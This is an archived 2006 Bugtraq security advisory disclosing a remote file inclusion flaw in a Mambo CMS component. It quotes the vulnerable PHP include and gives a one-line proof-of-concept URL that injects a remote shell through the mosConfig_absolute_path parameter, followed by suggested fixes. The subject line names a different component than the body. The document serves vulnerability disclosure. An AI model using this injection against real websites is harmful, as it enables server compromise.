Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
From: Outlaw@xxxxxxxxxxxxxxxxx
Date: 20 Aug 2006 01:55:01 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

                
###########################################################################################
                #                       Aria-Security.net Advisory              
                          #
                #                       Discovered  by: O.U.T.L.A.W             
                          #     

                #                       < www.Aria-security.net >               
                          #
                #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp    
                          #
                #                                                               
                          #
                
###########################################################################################


#Software: Mambo Components ContXTD
#Attack method: Remote File Inclusion
#Source:

** ensure this file is being included by a parent file */
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' );

include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' );
        
 

************************************************************************************

                                                                                
          
#Proof of Concept:                                                              
          
#
#www.site.com/contxtd/contxtd.class.php?mosConfig_absolute_path=SHELL
#
#                                                                               
                                

#                                                         
#Solutions : 
#1 - If you have access on webserver turn register_globals in php.ini off
#2 - You must give a value before put the value of variable in the include 
function or check and filter #unnormal entrance out . 
#
#                                                                               
                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx

Follow-Ups:
- Re: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
  - From: Jan de Groot

Prev by Date: [XSec-06-08]: Windows 2000 Multiple COM Object Instantiation Vulnerability
Next by Date: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
Previous by thread: [XSec-06-08]: Windows 2000 Multiple COM Object Instantiation Vulnerability
Next by thread: Re: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
Index(es):
- Date
- Thread